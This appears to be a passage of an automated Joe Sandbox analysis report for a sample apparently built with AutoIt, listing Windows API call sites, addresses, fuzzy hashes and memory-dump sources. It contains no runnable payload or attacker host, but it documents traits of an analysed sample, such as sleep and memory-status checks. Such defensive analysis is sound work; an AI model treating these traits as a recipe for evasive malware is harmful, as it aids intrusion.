                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2783949968-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00417D1A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00417D31
                                                                                                                                                                                                                                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 00417D4F
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID:
• API String ID: 3521780317-0
• Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
• Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
• Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
• Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
APIs
• GetDesktopWindow.USER32 ref: 00471144
• GetDC.USER32(00000000), ref: 0047114D
• GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
• ReleaseDC.USER32(00000000,?), ref: 0047117B
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
• Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
• Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
• Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
APIs
• GetDesktopWindow.USER32 ref: 00471102
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                                                                                                                                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
• Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00414080
• __freeptd.LIBCMT ref: 0041408A
• ExitThread.KERNEL32 ref: 00414093
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
• String ID:
• API String ID: 3182216644-0
• Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
• Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
• Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
• Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: BuffCharLower
• String ID: $8'I
• API String ID: 2358735015-3608026889
• Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
• Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
• Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
• Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CopyVariant$ContainedObject$ErrorLast_malloc
• String ID: AutoIt3GUI$Container
• API String ID: 3380330463-3941886329
• Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
• Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
• Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
• Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0vH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1143807570-3662162768
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1787419579
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
• Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
• Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
• Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
• Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
• Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
• Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
• Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 004515DA
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
• Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
APIs
• Sleep.KERNEL32(00000000), ref: 00474833
• GlobalMemoryStatusEx.KERNEL32 ref: 00474846
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
• Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
